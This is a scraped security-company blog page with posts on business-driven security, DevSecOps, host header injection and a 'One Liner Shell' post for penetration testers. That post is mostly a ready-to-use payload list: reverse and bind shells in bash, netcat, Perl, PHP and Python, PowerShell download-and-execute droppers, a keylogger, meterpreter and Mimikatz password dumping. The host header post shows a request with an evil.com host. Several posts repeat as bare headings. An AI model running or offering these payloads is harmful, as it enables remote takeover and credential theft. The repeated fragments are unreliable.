Showing posts with label security expert. Show all posts

Friday, 17 August 2018

From Tech to Business-Driven Security

FROM TECH TO BUSINESS-DRIVEN SECURITY

INTRODUCTION:

In today’s digital world, IT security strategy must be transformed into Business-driven security strategy to prevent failure of vital digital transformation projects which will become irrelevant to the business model of an organisation.

TRANSFORMATION TO BUSINESS-DRIVEN SECURITY:

Information Security Practitioners like security analyst and consultants of an organisation should look at the information security from a business perspective to enforce proper risk management so that it will be useful to prevent the data loss or assets that are most important to the organisation during the time of a threat.

For enforcing the business-driven model of Information Security in an organisation, it is essential to understand and assess the risks for the organisation in real time and mitigating the risk by determining the incidents conclusively by a skilled incident management professional team. In short, it is critical to have a “Risk Management in an Organization” than a regular threat management team.

To create a compelling business-driven security model, a business organisation must identify all of its assets, where they are placed, which assets are more vulnerable to threats and attacks etc., which will help them to categorize their holdings for the useful incident and risk management and mitigation of threats.

WHY BUSINESS DRIVEN SECURITY MODEL : ITS IMPORTANCE :

The need for business-driven security arises, mainly due to the evolving threats from various aspects of technology which includes the latest trends like the Internet of Things (IoT), Artificial Intelligence (AI), Machine Learning etc., As these new technologies evolve, the attack vector for these technologies also evolves every day.

For example, IoT devices may have vulnerabilities in firmware level and application level, which an attacker can exploit to take over the IoT device’s control, which gradually increases the threat for the owning organisation.

Another primary reason for the business-driven security model is “The Gap of Grief”. The Gap of Grief is a concept used to refer to void in understanding of how the security vulnerabilities can cause financial and reputation loss problems in an organisation. A significant part of this problem comes with the fact that the CISOs and other information security staffs in general like Penetration testers and consultants failing to translate the challenges and risks in assessing a threat. In cyber-security terms, the problems created by not effectively being able to report security issues to the appropriate people at the right time causes the gap of grief.

Let’s consider an example scenario: The CEO tours television and radio studios in a bid to dispel negative press and to assure the public that their data is safe with the company. This often backfires when it becomes apparent that the CEO has very little knowledge of their company’s cyber-security operations, let alone how the breach occurred or how many customers were affected. This causes problems to the organisation, and the gap occurs.

ASPECTS OF BUSINESS DRIVEN MODEL:

The key element of the business-driven security model is to focus more on detection and assessing the threats then protection as it is a complicated job to carry out. Then there should be a valid defence strategy specifically for all the assets and their vulnerabilities. This defence strategy should have a definite cost to benefit values assigned.

Another aspect of the business-driven security model is, it should include the required and skilled people, process and technology (Tools and services) for carrying out risk management process.

Organizations need to find out the security gaps between the current security level of their application and infrastructure and where they want to be for an ideal security level for effective risk management. This gap analysis process is one of the key aspects to create a business-driven security model for the organisation. This gap analysis process helps out the security staffs to work on patching the gaps and vulnerabilities effectively.

Management should come up with a proper rank level for all their assets and applications based on the key values of assets. Then it will be easy for the security people to carry out gap analysis on a regular basis based on the risk ratings of assets and applications.

CONCLUSION:

The business-driven security model is more useful for an organisation, not just regarding cost but also regarding proper assessment of threats and risk. If implemented incorrect way, it will become an essential security model to help security people mitigate the threats and security breaches.Through a business-driven approach, BriskInfosec productively orchestrates business driven security with more agile and secure way. Since it relies heavily on the risk levels for an organisation, it will help any organisation to save a lot of money and time which they were spending on the incident and threat management.

Just Talk and Hire us to create Business Driven security solutions for your orgnization

Email – contact@briskinfosec.com

REFERENCES:

AUTHOR :

Dawood Ansar

Security Engineer

Briskinfosec Technology and Consulting Pvt Ltd

Find me @https://www.linkedin.com/in/dawood-ansar-29403213b/

Monday, 30 July 2018

ONE LINER SHELL

One Liner Shell, Draws attention to the different types of shell and droppers which plays a most important role during penetration testing. These one-liners can be used for gaining access to the system. These scripts will be used by red teamers during their pentest.Shells are described as a small piece of code or program which is used to gain a command execution on a specific device. There are two types of shells,

Reverse Shell
Bind Shell

REVERSE SHELL

Reverse shell is a type of shell in which the victim machine connect back to the attacker machine. The attacker machine runs a listener on a specific port on which it receives the connection by performing command or code execution.

BIND SHELL

Bind shell is a type of shell in which the attacker creates a communication port or a listener on the victim machine and waits for the attacker to connect.

I was impressed by a tool, so I have decided to write this blog. Tool link: https://github.com/D4Vinci/One-Lin3r. To use these shell in your real-time scenario, you need to fill up the IP address and the port number.

We will be discussing the reverse shell and dropper for windows and Linux platforms.

WINDOWS PAYLOADS

```
Microsoft's SyncAppvPublishingServer
```
```
WinInstaller_dropper
```
```
Win_Remote_Management
```
```
Execute C# files
```
```
mshta hta
```
```
netcat bind shell
```
```
netcat reverse shell
```
```
rundll32 dropper
```
```
escalate services
```
```
Key logger
```
```
meterpreter shell
```
```
mimikatz passwds
```
```
Socket reverse
```

 LINUX PAYLOADS

```
bash reverse
```
```
netcat bind
```
```
piped reverse
```
```
netcat reverse
```
```
sockets reverse perl
```
```
socket reverse php
```

1 WINDOWS PAYLOADS

Here are some of following commands for shell in Windows platforms. We need to focus on the payload part and if you are willing to edit the payload, go for it.

MICROSOFT’S SYNCAPPVPUBLISHINGSERVER

The Sync-AppvPublishingServer cmdlet initiates the Microsoft Application Virtualization (App-V) publishing refresh operation in the context of the current user. The publishing refresh connects to all added servers on the client and exposes new App-V packages and their respective extension points to the user. Using Microsoft’s SyncAppvPublishingServer to download and execute a PowerShell file.

Type = Dropper
Payload = SyncAppvPublishingServer.exe "n;((New-ObjectNet.WebClient).DownloadString('{mention the url of the payload}') | IEX

WININSTALLER_DROPPER

Windows Installer is a software component and application programming interface (API) of Microsoft Windows used for the installation, maintenance, and removal of software. Passing msi file URL to the Windows installer will download and execute the payload.

type = Dropper
Payload = msiexec /i {mention the msi file URL here}

WIN_REMOTE_MANAGEMENT

Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. Windows Remote Management provides the ability to remotely execute wmi commands

type = execute
Payload = winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="{your_command_here}"}
Execute C# files

Using the .NET compiler to compile a c# payload locally that can then be executed.

Type = Execute

Payload = C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:payload.exe {your_cs_file_here}

MSHTA HTA

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). Uses mshta command to download and execute your hta file.

Type = Dropper

Payload = mshta {your hta file url}

NETCAT BIND SHELL

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Uses netcat tool to setup a bind shell

Type = bind shell

Payload = nc -nv 4444 -e cmd.exe

NETCAT REVERSE SHELL

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Uses netcat tool to establish a reverse shell

Type = reverse 
Payload = nc -nv {ip} {port} -e cmd.exe
rundll32 dropper

The rundll32.exe process is responsible for running DLLs and placing its libraries in the memory. Using rundll32.exe to download and execute a PowerShell file.

Type = Dropper
Payload = rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('{your}');"

Escalate services

This is a power shell script which is used from power tools which are written by power Shell Empire. This script is used for escalation processes, so this script will search for vulnerable service privilege opportunities using the script from Power Tools

Type = escalation
Payload = Powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks

KEY LOGGER

Here a power shell script is been used to retrieve keystrokes. Using a script from powersploit to log keyboard strokes to C:\Users\Public\key.log

Type = Local
 Payload = Powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1');Get-Keystrokes -LogPath C:\Users\Public\key.log

METERPRETER SHELL

Metasploit meterpreter reverse HTTPS shell using a PowerShell script from powersploit

Type = Reverse
Payload = Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost {ip} -Lport {port} -Force

MIMIKATZ PASSWORDS

Grabbing passwords from memory using Invoke-mimikatz script from PowerSploit

Payload = Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

SOCKET REVERSE

Python socket to connect back & execute data with sub process.

Type = reverse

Payload = python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call("cmd");'

LINUX PAYLOADS

Bash reverse

Interactive shell via bash’s builtin /dev/TCP.

Type = Reverse
Payload = bash -i >& /dev/tcp/{ip}/{port} 0>&1

NETCAT BIND

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Uses netcat tool to setup a bind shell

Type = bind
Payload = nc -lvp 4444 -e /bin/sh

NETCAT REVERSE

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Establish a reverse connection with netcat.

Type = Reverse
Payload = nc -e /bin/sh {ip} {port}

PIPED REVERSE

Uses a tool exists on most of the systems and the output of the commands will be piped back.

Type = Reverse
Payload = exec 5<>/dev/tcp/{ip}/{port} && cat <&5 | while read line; do $line 2>&5 >&5; done

SOCKETS REVERSE PERL

Uses Perl sockets & the output of your commands will be piped back.

Type = reverse

Payload = perl -e 'use Socket;$i="{ip}";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

SOCKET REVERSE PHP

Uses PHP sockets & exec to create a reverse shell.

Type = reverse
Payload = php -r '$sock=fsockopen("{ip}",{port});exec("/bin/sh -i <&3 >&3 2>&3");'

CONCLUSION

In today’s world, the shell is becoming very famous, interesting and increasing in numbers. Mostly attackers preferred to hack or compromise a system using shell only because they are very flexible regarding modifying the code. Major Cyber-attacks are performed using the reverse shell. So users need to be very careful while handling any tools or files. Before executing a tool or a file try to scan the file for any malware detection (you can use some online scanners such as https://www.virustotal.com/#/home/upload or https://nodistribute.com/ ).

Be prepared and be safe

AUTHOR

Venkatesh C.S

Security Engineer

Briskinfosec Technology and Consulting PVT LTD

Find me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/

Tuesday, 26 June 2018

DevSecOps in the age of the cloud

DEVSECOPS IN THE AGE OF THE CLOUD

DEVOPS’S SECURITY:

In DevOps, the application is often releasing new features and functionalities in every release for the business needs and deployed in the cloud for flexibility, service delivery, but often they are skipping the information security to complete the organisation’s on-time release. This blog explores the overview of DevOps Vs DevSecOps and how security professionals and developers need to be ready before integrating DevSecOps.

CONTENT:

```
DevOps vs DevSecOps
```
```
Why we need to move DevSecOps
```

Integrating DevSecOps

Are you a security professional or developer in DevSecOps

```
Blending tools and technologies
```
```
Developers can make a better world
```

```
Conclusion
```

DEVOPS VS DEVSECOPS:

DevOps is the model which is in the background process to help the organization to archive the continuous versions. DevOps (Development and operations) is a development practice model which allows organisations to increase the speed of producing products and services. It is getting more famous and implementing from start-up to enterprise in different industries. At the same time, DevOps has some drawback in the process which may have insecure codes and bugs in the production release these bugs can lead to serious security vulnerabilities which can cause data loss or data breaches. Solution to combine the information security not to slow down the business and not getting affected by vulnerabilities then information security should be integrated into development phrase with security controls, so that’s how DevSecOps is introduced. DecSecOps is a model which collaborate information security and DevOps.

DevSecOps is similar to DevOps, but security will be in place in every phase of the development. DevSecOps can be a solution for Big cloud environments like Google, Facebook and Netflix etc. Each day they are updating thousands and thousands of lines in production which can’t be tested after the deployment on each release, and it needs to be addressed in DevOps itself. In DevOps, fixing the vulnerabilities will take a longer time than DevSecOps model.

WHY WE NEED TO MOVE DEVSECOPS:

The following are the main reasons which companies are moving to DevSecOps :

Keep your code secure in every production release.
Identification & Fixing the vulnerabilities is fast in DevSecOps.
Integrating Security with automation tools like SAST in development will increase the continuous delivery and security.

INTEGRATING DEVSECOPS:

Here are some Areas where security peoples and developers need to get ready for DevSecOps:

Are you a security professional or developer in DevSecOps
Integrating tools and technologies
Developers can make a better world

ARE YOU A SECURITY PROFESSIONAL OR DEVELOPER IN DEVSECOPS:

On DecSecOps both security professional and developer are core components, and their contribution to security is essential. The security team should contribute to development by bringing series of tests and quality conditions without slowing the process. Security parameters and metrics are incorporated into development then the chance for security to be involved in the procedures for DevOps is much higher. Security teams should work with QA and development to define specific parameters and critical qualifiers that need to be addressed before any code can be promoted. Also, security team should integrate automated tools in testing and development environment to discover and fix the flaws as fast as possible. As a developer, they have to aware of secure code review and basic prevention code practices for common vulnerabilities. So radically ideas on DevSecOps is “everyone is responsible for securing the product”.

INTEGRATING TOOLS AND TECHNOLOGIES:

Automating security testing in DevSecOps requires incorporating testing within development and processes. Finding code related vulnerabilities with secure code review and adding plugins like IDE that finds instant insights and remediation guidance as problems are introduced. Consider a combination of testing methodologies like OWASP, technologies, including static, dynamic, and software composition analysis for example you can you some testing tools like burpsuite, ZAP proxy tools with Jira or any other piping tools to combine testers and developers and also ensure your policies align to the security tools/solutions with your developers are using to connect security tools in development environment.

DEVELOPERS CAN MAKE A BETTER WORLD :

In Organization, if there a lack of experienced or qualified security professionals then developers have to take more responsibility for security. In that situation developers have to be trained in security, developers can make significant improvements in security when given proper training on remediation guidance and handling secure code review tools that allow them to check their code against vulnerabilities. You can turn a developer who shows more interest in security can make them into security professional, and they can improve their secure coding practices and also security testing skills.

CONCLUSION:

In the age of cloud, collaborating DevSecOps requires a lot of automation and integrating security in DevOps. Areas discussed in this blogs can be an excellent first step to Adopting these implements. Implementation will require subtle changes as the various concepts are needed to be applied within the organisation and frameworks need to be replaced with new Practices.

AUTHOR

Dinesh C

Security Engineer

Briskinfosec Technology And Consulting Pvt Ltd.,

follow me @https://www.linkedin.com/in/dineshdinz/

Saturday, 2 June 2018

From Tech to Business-Driven Security

FROM TECH TO BUSINESS-DRIVEN SECURITY

INTRODUCTION:

TRANSFORMATION TO BUSINESS-DRIVEN SECURITY:

WHY BUSINESS DRIVEN SECURITY MODEL : ITS IMPORTANCE :

ASPECTS OF BUSINESS DRIVEN MODEL:

Another aspect of the business-driven security model is, it should include the required and skilled people, process and technology (Tools and services) for carrying out risk management process.

CONCLUSION:

Just Talk and Hire us to create Business Driven security solutions for your orgnization

Email – contact@briskinfosec.com

REFERENCES:

AUTHOR :

Dawood Ansar

Security Engineer

Briskinfosec Technology and Consulting Pvt Ltd

Find me @https://www.linkedin.com/in/dawood-ansar-29403213b/

Wednesday, 30 May 2018

HOST HEADER INJECTION

Most of the common web servers are configured in the form of the same server to host many web applications with the same IP address this type of configuration is the reason for the Host Header issues. Here we are going to deal with the host header injection attack in various forms, its impact and mitigation.

HOST HEADER ISSUES:

An attacker can manually divert the code to produce the hacker desired output simply by editing the host header. Most probably web servers are configured to pass the host header to the first virtual host in the list without proper reorganisation, So It is possible to send the HTTP requests with arbitrary host headers to the first virtual host. In that case, if we specify an invalid Host means the web server process it and pass the invalid host header to the first virtual host in the list.

An attacker can modify the host name by giving a fake web page or a vulnerable website and deliver it to the user and fraud the users.

Example:

The result will redirect the user to the attacker’s website by simply modifying the host header

RISK:

Most probably many websites use the values provided in the user input field and uses it afterwards without an improper input validation. Commonly this will not have that much impact on the application, but in some cases, if the application accepts the host header, the risk lays there. There may occur,

URL redirection problems.
Username and password credentials may be theft.
Financial loss may happen in Finance sectors.

HOW ATTACKERS UTILIZE HOST HEADER ATTACK:

The exploitation is based on the logic of the web application. If the application does not use the user input value, then there is no risk. But the host header attack is considered as a serious issue at the time of resetting our password. When we are resetting our forgotten password, or we change our password for our privacy, the web application generates a link dynamically there it uses the host header provided in the request. In this scenario, the hacker uses this header for their evil cause. The hackers use some social engineering and phishing attacks for getting the link. So, the developer should realise the importance of the host header attack.

WHY HOST HEADER HAPPEN:

It is an injection type of attack that done on the HTTP headers.

HTTP headers are dynamically generated based on the input of the user. User inputs can be edited or spoof by attackers. It is accessible by everyone.
Any website that does not correctly validate or verify the HTTP Host headers.

HOW TO FIND HOST HEADER ISSUES:

Verify the header of the request. Inject other domain in the header field and check the response in the browser.

PHASES OF HOST HEADER ISSUES:

WEB CACHE POISONING WITH SINGLE HOST HEADER:

Web cache poisoning is a kind of technique used by a hacker to manipulate a web cache that serves a poisoned content for those who requests that webpage. For this attack, the hacker needs to poison a caching proxy run by the website itself, or content delivery networks (CND’s), or other caching mechanisms are carried out between the client and the server. In this scenario where caching is enabled, A hacker will potentially embed a remote URL as the base-URL for any website. This scenario then causes other users who request the site will be redirected unknowingly. Thus if an application fails to prevent the user from using the X-Forwarded-Host header, it will effectively override the Host header. The cache will serve the poisoned content to everyone those who request the webpage without the knowledge of the victim.

EXAMPLE:

X-FORWARDED HOST HEADER:

Host header injection is mitigated by preventing the tampering of Host header. It means if any request is made with tampered host header, the application responds with an error message like “404 Not Found”. Another way to pass arbitrary Host headers is to use the X-Forwarded-Host header. In some configurations, this header will rewrite the value of the Host header. Therefore it’s possible to make the following request.

EXAMPLE:

WEB POISONING WITH MULTIPLE HOST HEADERS:

It is one of the forms of web cache poisoning attack. It is similar to that of the web cache poisoning using the single header. The only difference is that in this type is that it use multiple headers more than one to the users those who request the website. By tampering with the header, it is possible. The web cache will deliver the wrong content to the user with their knowledge.

EXAMPLE:

GET / HTTP/1.1

Host: www.example.com

Host: www.evil.com

PASSWORD RESET POISONING:

The significant impact of Host header attack lies in the password resetting functionality. The most common scenario of this attack the hacker generates a secret token and sends a mail that has a link that contains the mysterious symbol of the hacker. The hacker urges the user to make use of his link, and to requests, a password reset link which redirects the user to him. In this case, if the web application makes use of this host header value when composing with the reset link and when the user clicks the poisoned reset link in the mail, then the user will become a victim to the hacker. The attacker will obtain the password reset token and make use of his password for his destructive purposes.

EXAMPLE:

IMPACT OF HOST HEADER ISSUES:

A hacker can modify the legitimate host header with a wrong host in the request, and it poisons the cache of the web application server and the proxy. It has nothing to do with the browser. When the authorised user tries to access the host, but still the cache of the web server is poisoned with the hacker’s domain that redirects the licensed user to the domain of the hacker.
If the host headers are used for writing links without a proper HTML encoding, there may be a possibility for Cross-site
Access to the internal
HTML INJECTION also can be done.

MITIGATIONS FOR HOST HEADER ATTACK:

Proper sanitation of input values.
Proper verification of the request that it came from the original target host or not.
Mitigate the Host header attack in Apache and Nginx by creating a dummy virtual host that catches all requests from unrecognised Host headers.
Whitelist the trusted domains at the initial phase of the web application.
Respective Mapping of the domains that received in the host header of each HTTP request with itself.
Use secure server configuration.
Disable the support for the X-Forwarded-Host header option.

CONCLUSION:

Many application developers did not realise that the HTTP host header is accessible and controlled by all user. In an application security perspective, the input given by the user is always deceivable, and it is unsafe to trust. So, a web developer should consider host header issues as a dangerous thing not to and neglect it; we should find the impacts caused by the host header and follow the mitigation to safeguard ourselves.

We Briskinfosec is Center for Cyber Security Excellence passionate to protect you from all application security threats on your budget. Talk to our experts contact@briskinfosec.com

AUTHOR

Alex Daniel Raj

Security Engineer

Briskinfosec Technology and Consulting Pvt Ltd.,

follow me @https://www.linkedin.com/in/alex-daniel-raj-xavier-b77869145/

Friday, 17 August 2018

From Tech to Business-Driven Security

INTRODUCTION:

TRANSFORMATION TO BUSINESS-DRIVEN SECURITY:

WHY BUSINESS DRIVEN SECURITY MODEL : ITS IMPORTANCE :

ASPECTS OF BUSINESS DRIVEN MODEL:

CONCLUSION:

REFERENCES:

AUTHOR :

Monday, 30 July 2018

ONE LINER SHELL

REVERSE SHELL

BIND SHELL

1 WINDOWS PAYLOADS

MICROSOFT’S SYNCAPPVPUBLISHINGSERVER

WININSTALLER_DROPPER

WIN_REMOTE_MANAGEMENT

MSHTA HTA

NETCAT BIND SHELL

NETCAT REVERSE SHELL

KEY LOGGER

METERPRETER SHELL

MIMIKATZ PASSWORDS

SOCKET REVERSE

LINUX PAYLOADS

NETCAT BIND

NETCAT REVERSE

PIPED REVERSE

SOCKETS REVERSE PERL

SOCKET REVERSE PHP

CONCLUSION

AUTHOR

Tuesday, 26 June 2018

DevSecOps in the age of the cloud

DEVOPS’S SECURITY:

CONTENT:

DEVOPS VS DEVSECOPS:

WHY WE NEED TO MOVE DEVSECOPS:

INTEGRATING DEVSECOPS:

ARE YOU A SECURITY PROFESSIONAL OR DEVELOPER IN DEVSECOPS:

INTEGRATING TOOLS AND TECHNOLOGIES:

DEVELOPERS CAN MAKE A BETTER WORLD :

CONCLUSION:

AUTHOR

Saturday, 2 June 2018

From Tech to Business-Driven Security

INTRODUCTION:

TRANSFORMATION TO BUSINESS-DRIVEN SECURITY:

WHY BUSINESS DRIVEN SECURITY MODEL : ITS IMPORTANCE :

ASPECTS OF BUSINESS DRIVEN MODEL:

CONCLUSION:

REFERENCES:

AUTHOR :

Wednesday, 30 May 2018

HOST HEADER INJECTION

CONTENTS:

HOST HEADER ISSUES:

RISK:

HOW ATTACKERS UTILIZE HOST HEADER ATTACK:

WHY HOST HEADER HAPPEN:

HOW TO FIND HOST HEADER ISSUES:

PHASES OF HOST HEADER ISSUES:

WEB CACHE POISONING WITH SINGLE HOST HEADER:

X-FORWARDED HOST HEADER:

WEB POISONING WITH MULTIPLE HOST HEADERS:

PASSWORD RESET POISONING:

IMPACT OF HOST HEADER ISSUES:

MITIGATIONS FOR HOST HEADER ATTACK:

CONCLUSION:

AUTHOR

Subscribe To